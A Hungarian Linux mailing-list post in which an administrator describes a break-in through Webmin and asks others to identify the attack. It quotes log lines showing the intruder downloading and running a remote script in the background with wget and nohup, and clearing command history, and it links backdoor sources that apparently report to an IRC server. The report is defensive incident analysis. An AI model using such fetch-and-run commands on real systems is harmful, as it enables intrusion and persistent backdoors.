Sziasztok! Valaki bejött hozzám webmin-en keresztül, nem tudom még pontosan milyen rést sikerült neki kihasználnia, de mindenesetre hozzáfért a shell-hez és ügyeskedett pár dolgot a napló szerint (annyira azért nem volt ügyes, mert a webmin log-ot nem törölte).
Íme egy részlet a webmin logból: Logged actions by user root ... 06:36 Ran command killall time Command Shell root 216.247.238.164 29/Dec/2007 06:35 Ran command mkdir /usr/lib/sin; cd /usr/lib/sin; wget 208.44.109.109/.../init; nohup /bin/sh init & Command Shell root 216.247.238.164 29/Dec/2007 06:35 Cleared command history Command Shell root 216.247.238.164 29/Dec/2007 06:23 Cleared command history Command Shell root 216.247.238.164 29/Dec/2007 06:23 Ran command mkdir /usr/lib/sin; cd /usr/lib/sin; wget 208.44.109.109/.../init; nohup /bin/sh init & Command Shell root 216.247.238.164 29/Dec/2007 A /usr/lib/sin könyvtárat meg is találtam pár fájllal, amiket még szintén nem néztem át rendesen, de úgy látom hogy kis c programokkal próbált valamiféle backdoor-t vagy acc-ot generálni magának, amit aztán irc szerverre küldött el a progi. A forrásokat feltettem ide: http://spider.homelinux.org/update.c http://spider.homelinux.org/time.c Gugliztam egy kicsit, de hirtelen nem találtam semmit ilyen betörési módszerre. Esetleg aki hallott róla röviden el tudná mondani, mi is ez? Üdv.: Z. _________________________________________________ linux lista - [email protected] http://mlf2.linux.rulez.org/mailman/listinfo/linux
